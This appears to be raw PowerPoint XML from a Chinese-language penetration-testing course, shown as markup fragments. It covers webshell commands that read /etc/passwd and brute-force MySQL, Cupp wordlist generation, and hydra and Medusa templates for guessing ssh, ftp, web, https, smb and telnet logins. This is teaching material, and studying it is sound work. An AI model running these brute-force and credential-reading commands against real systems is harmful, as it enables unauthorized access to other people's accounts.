              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>passwd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400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>www-data@target:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/www/html PHP&gt; :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>audit_etcpasswd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猜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>凭据</a:t>
            </a:r>
          </a:p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400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>www-data@target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/www/html PHP&gt; :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bruteforce_sql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mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>roblast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micjanost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pjgomes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pdpeers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> root -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fpwds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> wordlists/huge.txt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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>查看信息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member@target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>:/home/member/logs PHP&gt; :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system_info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>client_ip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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450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密码爆破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hydra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54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5350" y="1162050"/>
            <a:ext cx="92392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mtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cupp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>生成字典</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="120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smtClean="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e ns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ssh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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-o save.log -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV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ssh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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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hydra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ftp -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>16) -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hydra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ftp -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-e ns –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>方式提交，破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>登录：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hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e ns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http-get /admin/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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hydra -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>线程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -e ns -f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http-get /admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.php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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>方式提交，破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>登录：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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>：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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hydra -m /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>muts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -P pass.txt 10.36.16.18 https</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>smb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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hydra -l administrator -P pass.txt 10.36.16.18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>smb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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>、破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>telnet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hydra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telnet -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>用户 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>密码字典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-t 32 -s 23 -e ns -f -V</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20526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密码爆破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medusa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55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1075" y="1862941"/>
            <a:ext cx="836295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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>单个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目标爆破：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cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Medusa -h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-u root -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/passwords/wordlists/rockyou.txt -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh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2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>目标爆破：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需要将目标整理到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ip.txt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1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Medusa -H ip.txt -u root -P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/passwords/wordlists/rockyou.txt -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ssh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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>如果账号不是</a:t>
            </a:r>
